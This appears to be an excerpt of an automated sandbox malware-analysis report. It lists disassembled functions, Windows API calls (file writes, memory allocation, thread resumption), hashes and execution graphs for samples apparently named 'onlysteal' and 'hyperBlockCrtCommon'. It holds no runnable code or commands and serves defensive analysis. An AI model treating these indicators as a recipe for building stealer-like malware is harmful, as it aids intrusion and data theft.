                                      • Instruction ID: 3cd50e30a0877138fa7088ca3ccab76744b152c31a9ba963c2c2856d25306e6c
                                      • Opcode Fuzzy Hash: b0e7c505ee4fcd3df1dbfc0afecd54db411cb1af52f4d176b4a1816969db5030
                                      • Instruction Fuzzy Hash: EF017171D50319A6DF15ABA4ED4AEDF73FCAF08300F000466F606E3191E6B496A48FA5
                                      Function 0025BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002597E5: GetLastError.KERNEL32(?,00271030,00254674,00271030,?,?,00253F73,00000050,?,00271030,00000200), ref: 002597E9
                                        • Part of subcall function 002597E5: _free.LIBCMT ref: 0025981C
                                        • Part of subcall function 002597E5: SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 0025985D
                                        • Part of subcall function 002597E5: _abort.LIBCMT ref: 00259863
                                      • _abort.LIBCMT ref: 0025BB80
                                      • _free.LIBCMT ref: 0025BBB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLast_abort_free
                                      • String ID: p&
                                      • API String ID: 289325740-4236815001
                                      • Opcode ID: 6cc78bf015391767444b7f974ae7227b3a95014bac6578feb8a3d68b57092245
                                      • Instruction ID: 7549cfdf0e2fc2f1e1dc9bb320cf2b7a6e5bb8e5d0ebf38c67e4e2117722f84d
                                      • Opcode Fuzzy Hash: 6cc78bf015391767444b7f974ae7227b3a95014bac6578feb8a3d68b57092245
                                      • Instruction Fuzzy Hash: AE01D675D21622DBCF22AF68940222DB7B0BF04736B16010AFC2467295DBF56D658FC9
                                      Function 0024B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: ($$Z$
                                      • API String ID: 2696272793-3003454490
                                      • Opcode ID: 1fc9e7d9bf61cd6b5eace7243a285a6dc077fcdbd4ee5b11ebca3417873712b2
                                      • Instruction ID: 50eeb70f41173e616a3c4d11300c7717a1c56c9b478d3b1ee85ffb55cc9d09b5
                                      • Opcode Fuzzy Hash: 1fc9e7d9bf61cd6b5eace7243a285a6dc077fcdbd4ee5b11ebca3417873712b2
                                      • Instruction Fuzzy Hash: FC0146B6610109FF9F05DFB0EC59CAEBBBDEF08344700415AB906D7120E631AE44DBA0
                                      Function 00258268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0025BF30: GetEnvironmentStringsW.KERNEL32 ref: 0025BF39
                                        • Part of subcall function 0025BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025BF5C
                                        • Part of subcall function 0025BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0025BF82
                                        • Part of subcall function 0025BF30: _free.LIBCMT ref: 0025BF95
                                        • Part of subcall function 0025BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BFA4
                                      • _free.LIBCMT ref: 002582AE
                                      • _free.LIBCMT ref: 002582B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID: 0")
                                      • API String ID: 400815659-1042997966
                                      • Opcode ID: 3b917e57cb87bf935a52b7bb69b8b811e3018bb9f32205bbb10aa198348cfa69
                                      • Instruction ID: e1bd5f787e37e1d474a95092dceb9684ce7da5a839d5560b1303debf596e22b0
                                      • Opcode Fuzzy Hash: 3b917e57cb87bf935a52b7bb69b8b811e3018bb9f32205bbb10aa198348cfa69
                                      • Instruction Fuzzy Hash: 2CE0E533A3698291AB6136393C0262F2A404B8133BF140216FE10E60C3CEF0883E0CAE
                                      Function 00240FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00241206,?), ref: 00240FEA
                                      • GetLastError.KERNEL32(?), ref: 00240FF6
                                        • Part of subcall function 00236C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00236C54
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00240FFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: 2dde65a7c00d36b4d5655ad3724ce61a0640e37e9ed4982e0413b08a145c02e1
                                      • Instruction ID: 3eed890855bb9de2c00fae8f37ff2919e9c99191bc1858a54b6d986d2c7ade94
                                      • Opcode Fuzzy Hash: 2dde65a7c00d36b4d5655ad3724ce61a0640e37e9ed4982e0413b08a145c02e1
                                      • Instruction Fuzzy Hash: 82D02EB25281203AC6103728AC0ED6F3C088F22331F348B05F838602E6CB2989F14A96
                                      Function 0023E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,0023DA55,?), ref: 0023E2A3
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0023DA55,?), ref: 0023E2B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 986eccf80f041e98cc80827a537650d7c7325396f6669f189bbeb81ebad68a67
                                      • Instruction ID: 9a56b3539bfeeab4f384df16799d702faf4da8d8923543ea8ce5d81c5b2f7b2e
                                      • Opcode Fuzzy Hash: 986eccf80f041e98cc80827a537650d7c7325396f6669f189bbeb81ebad68a67
                                      • Instruction Fuzzy Hash: 8FC0123125071166EE30ABB47C0DB836A585B01B15F0A0448F681EA2D1DAF5C98886A0
                                      Function 0024E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E467
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: p$$z$
                                      • API String ID: 1269201914-2964916095
                                      • Opcode ID: 9a0df8e37e587c7b31d8bd032196d123de775421c6d216bde2473f0846e94490
                                      • Instruction ID: ce50be89b3c91dddb5eb037f994cb3ec3ddef9766cbcbfdd11b8ed64245ce127
                                      • Opcode Fuzzy Hash: 9a0df8e37e587c7b31d8bd032196d123de775421c6d216bde2473f0846e94490
                                      • Instruction Fuzzy Hash: 5FB012C527D040BC3F0CF1145C02C37020DD0C1B50331802EF905C0081D8808C700A32
                                      Function 0024E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E467
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: U$$z$
                                      • API String ID: 1269201914-1198662890
                                      • Opcode ID: 72cc666b10e239dc63a778c393f583860170528c81109590f19de98efeb4ba7b
                                      • Instruction ID: 3d5daa3737a4cdecd29528c2ee3ccb69b7ac5881c061e6583dc41aede88c5061
                                      • Opcode Fuzzy Hash: 72cc666b10e239dc63a778c393f583860170528c81109590f19de98efeb4ba7b
                                      • Instruction Fuzzy Hash: 6BB012D12780007C3F0C71105D06C37030DD0C1F20331C02EF705C0095E8844E710932

                                      Execution Graph

                                      Execution Coverage:17.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:42
                                      Total number of Limit Nodes:2
                                      execution_graph 10233 7ffd3488da35 10234 7ffd3488daa1 VirtualAlloc 10233->10234 10236 7ffd3488db7f 10234->10236 10237 7ffd3488bc35 10239 7ffd3488bc5f WriteFile 10237->10239 10240 7ffd3488bdcf 10239->10240 10225 7ffd3488a397 10226 7ffd3488a39c 10225->10226 10229 7ffd34889fb0 10226->10229 10228 7ffd3488a400 10230 7ffd34889fb9 CreateFileTransactedW 10229->10230 10232 7ffd3488bba8 10230->10232 10232->10228 10275 7ffd3488b98a 10276 7ffd3488b999 CreateFileTransactedW 10275->10276 10278 7ffd3488bba8 10276->10278 10254 7ffd34889ebd 10255 7ffd348eff20 10254->10255 10258 7ffd348ef110 10255->10258 10257 7ffd348f0009 10259 7ffd348ef11b 10258->10259 10261 7ffd348ef1be 10259->10261 10262 7ffd348ef1d7 10259->10262 10261->10257 10263 7ffd348ef22a ResumeThread 10262->10263 10264 7ffd348ef1e2 10262->10264 10266 7ffd348ef2f4 10263->10266 10264->10261 10266->10261 10241 7ffd3488d5d1 10242 7ffd3488d5ed GetSystemInfo 10241->10242 10244 7ffd3488d6c5 10242->10244 10267 7ffd34a61ca5 10268 7ffd34a61cbf QueryFullProcessImageNameA 10267->10268 10270 7ffd34a61f4a 10268->10270 10271 7ffd3488d113 10272 7ffd3488d162 10271->10272 10273 7ffd3488d59a GetSystemInfo 10272->10273 10274 7ffd3488d16a 10273->10274 10245 7ffd3488d154 10246 7ffd3488d15a 10245->10246 10249 7ffd3488d59a 10246->10249 10248 7ffd3488d160 10250 7ffd3488d5a5 10249->10250 10251 7ffd3488d5ed GetSystemInfo 10249->10251 10250->10248 10253 7ffd3488d6c5 10251->10253 10253->10248

                                      Executed Functions

                                      Function 00007FFD34A64540 Relevance: .7, Instructions: 675COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2168505127.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34a60000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4fca811ec10680fd4f85f3fc4afb3184a6d1d3c4df538d934fb0d6f46ceafc1d
                                      • Instruction ID: f72acd649e12574bae4126261c406fe867477282f668296d9ab4c29e0b4b44e3
                                      • Opcode Fuzzy Hash: 4fca811ec10680fd4f85f3fc4afb3184a6d1d3c4df538d934fb0d6f46ceafc1d
                                      • Instruction Fuzzy Hash: 0D814670D0965D8FDB58DFA8D4A46EDBBB1FF5A315F20006AD009E7292CB39A981CB44
                                      Function 00007FFD34A61CA5 Relevance: 1.8, APIs: 1, Instructions: 325COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1803 7ffd34a61ca5-7ffd34a61d8b 1807 7ffd34a61d91-7ffd34a61ded 1803->1807 1808 7ffd34a61ebe-7ffd34a61f48 QueryFullProcessImageNameA 1803->1808 1818 7ffd34a61e53-7ffd34a61e5f 1807->1818 1819 7ffd34a61def-7ffd34a61df7 1807->1819 1809 7ffd34a61f50-7ffd34a61f83 1808->1809 1810 7ffd34a61f4a 1808->1810 1812 7ffd34a61fab-7ffd34a61fed call 7ffd34a62009 1809->1812 1813 7ffd34a61f85-7ffd34a61fa0 1809->1813 1810->1809 1827 7ffd34a61ff4-7ffd34a62008 1812->1827 1828 7ffd34a61fef 1812->1828 1813->1812 1826 7ffd34a61e65-7ffd34a61eba 1818->1826 1821 7ffd34a61e30-7ffd34a61e51 1819->1821 1822 7ffd34a61df9-7ffd34a61e0b 1819->1822 1821->1826 1824 7ffd34a61e0d 1822->1824 1825 7ffd34a61e0f-7ffd34a61e22 1822->1825 1824->1825 1825->1825 1830 7ffd34a61e24-7ffd34a61e2c 1825->1830 1826->1808 1828->1827 1830->1821
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2168505127.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34a60000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: FullImageNameProcessQuery
                                      • String ID:
                                      • API String ID: 3578328331-0
                                      • Opcode ID: 4817b2cbe411f3c062aa7e3afb80cf5ce5d9d7fe12479177fcfb84f4e9ecd967
                                      • Instruction ID: f05558e4167561619f3f8d88496163fafdd7a0bc2f541b6d147cb15881b1606e
                                      • Opcode Fuzzy Hash: 4817b2cbe411f3c062aa7e3afb80cf5ce5d9d7fe12479177fcfb84f4e9ecd967
                                      • Instruction Fuzzy Hash: EBB16E30618A8D8FEB78DF58C895BE93BE1FB59315F10412ED84ECB291DB78A541CB81
                                      Function 00007FFD3488B98A Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1831 7ffd3488b98a-7ffd3488b997 1832 7ffd3488b999-7ffd3488b9a1 1831->1832 1833 7ffd3488b9a2-7ffd3488ba68 1831->1833 1832->1833 1836 7ffd3488ba6a-7ffd3488ba81 1833->1836 1837 7ffd3488ba84-7ffd3488bba6 CreateFileTransactedW 1833->1837 1836->1837 1838 7ffd3488bba8 1837->1838 1839 7ffd3488bbae-7ffd3488bc30 1837->1839 1838->1839
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: f4e79f3177222fccd44190b5c0f2e4ba5f8f488ba2e1ed0a09c3b1a6190f133c
                                      • Instruction ID: 813d8ab907da37a07c6e329b5fec4e9d7b4fdafc39d111c252d3ccd163db7465
                                      • Opcode Fuzzy Hash: f4e79f3177222fccd44190b5c0f2e4ba5f8f488ba2e1ed0a09c3b1a6190f133c
                                      • Instruction Fuzzy Hash: BB912170908A5C8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A984CB04
                                      Function 00007FFD34889FB0 Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1842 7ffd34889fb0-7ffd3488ba68 1847 7ffd3488ba6a-7ffd3488ba81 1842->1847 1848 7ffd3488ba84-7ffd3488bba6 CreateFileTransactedW 1842->1848 1847->1848 1849 7ffd3488bba8 1848->1849 1850 7ffd3488bbae-7ffd3488bc30 1848->1850 1849->1850
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d428cf0e2c73eb307b588248a72f2ade4eac3da92bc960b21c8380fedabcc6a
                                      • Instruction ID: 60196e2f183b32d6836341e85aeaae3c3b717f4461ad30c97494a970ff0d84da
                                      • Opcode Fuzzy Hash: 4d428cf0e2c73eb307b588248a72f2ade4eac3da92bc960b21c8380fedabcc6a
                                      • Instruction Fuzzy Hash: 5B81E170A08A1C8FDB98DF58C895BA9BBF1FB69301F1051AED04EE3251DB75A980CF44
                                      Function 00007FFD3488BC35 Relevance: 1.7, APIs: 1, Instructions: 218fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1853 7ffd3488bc35-7ffd3488bd02 1857 7ffd3488bd2a-7ffd3488bdcd WriteFile 1853->1857 1858 7ffd3488bd04-7ffd3488bd27 1853->1858 1859 7ffd3488bdd5-7ffd3488be31 1857->1859 1860 7ffd3488bdcf 1857->1860 1858->1857 1860->1859
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 2b796fcee90945651850a8139051d948994ed8ee21f2eda2b368f331d7b698af
                                      • Instruction ID: adad1e52ae0ab5c6aea8ca26265b1e360f8461a3d82042cd26b639f9a33e627a
                                      • Opcode Fuzzy Hash: 2b796fcee90945651850a8139051d948994ed8ee21f2eda2b368f331d7b698af
                                      • Instruction Fuzzy Hash: 9C610570A08A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A985CB40
                                      Function 00007FFD3488D59A Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1862 7ffd3488d59a-7ffd3488d5a3 1863 7ffd3488d5a5-7ffd3488d5cf 1862->1863 1864 7ffd3488d5ed 1862->1864 1866 7ffd3488d5ef 1864->1866 1867 7ffd3488d5f0-7ffd3488d6c3 GetSystemInfo 1864->1867 1866->1867 1871 7ffd3488d6c5 1867->1871 1872 7ffd3488d6cb-7ffd3488d6fb 1867->1872 1871->1872
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 7a9d59a6c6bc1980032eeb7a770f8886b76c08dde5e061622d40717325f8bf2c
                                      • Instruction ID: 3a8c00cc551434ee7ea2697f90f1849f111b4b0cb6b588bdf9a18881ec22174b
                                      • Opcode Fuzzy Hash: 7a9d59a6c6bc1980032eeb7a770f8886b76c08dde5e061622d40717325f8bf2c
                                      • Instruction Fuzzy Hash: A0416D71A08A4C8FDB98EF98D899AE9BBF4FF56315F04416BD00DD7252DA34A846CB40
                                      Function 00007FFD348EF1D7 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 031f6cedd1267a83834393632ee35f72e5853ea535befedbc6b3af5d10198294
                                      • Instruction ID: 14220feb427ef7a1a7f19a91f90cda1b57f29d416f928e1cffeb40248e1184ce
                                      • Opcode Fuzzy Hash: 031f6cedd1267a83834393632ee35f72e5853ea535befedbc6b3af5d10198294
                                      • Instruction Fuzzy Hash: BA412974A0860C8FDB58EF98D895AEDBBF0FB5A310F10416AD40DE7252DA75A886CB40
                                      Function 00007FFD3488D5D1 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 54896601cd8be56374f804f6b69519bbb9194d8da8be59a49fce94f9804dc4bb
                                      • Instruction ID: 68eda044602692d166e2e495dc21f62ec763f5d574ff45731d11f92e16dc1b04
                                      • Opcode Fuzzy Hash: 54896601cd8be56374f804f6b69519bbb9194d8da8be59a49fce94f9804dc4bb
                                      • Instruction Fuzzy Hash: 7041A17090C68C8FDB99DFA8D899BE9BBF0EF56320F0441ABD04DD7252CA355846CB40
                                      Function 00007FFD3488DA35 Relevance: 1.4, APIs: 1, Instructions: 191memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 15c0d049ffabedaf16b559d531226590d8eb316f06f9b5cfb7a83416ad4298c1
                                      • Instruction ID: bdffa20a112ebe3b7560b6fb50b9630d60c15079ef0f6f0c5d8745e7039d102f
                                      • Opcode Fuzzy Hash: 15c0d049ffabedaf16b559d531226590d8eb316f06f9b5cfb7a83416ad4298c1
                                      • Instruction Fuzzy Hash: DC512A70908A5C8FDF98DF58C895BE9BBF0FB6A314F1042AAD04DE3251DB74A985CB41

                                      Non-executed Functions

                                      Function 00007FFD3488C6ED Relevance: .2, Instructions: 250COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4101fa39b07874b1962ef2c314eff0adce44a9e40a0327023346383be5e2be73
                                      • Instruction ID: 2d56f1e25ac7699b160f0f781b0052aca7ddbf81868ac2b0a06f82238fc57d0a
                                      • Opcode Fuzzy Hash: 4101fa39b07874b1962ef2c314eff0adce44a9e40a0327023346383be5e2be73
                                      • Instruction Fuzzy Hash: CE818370A08A8D8FEBA8DF18C8557F97BE1FF5A311F10412AE84DC7291DB74A945CB81

                                      Execution Graph

                                      Execution Coverage:14.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:25
                                      Total number of Limit Nodes:1
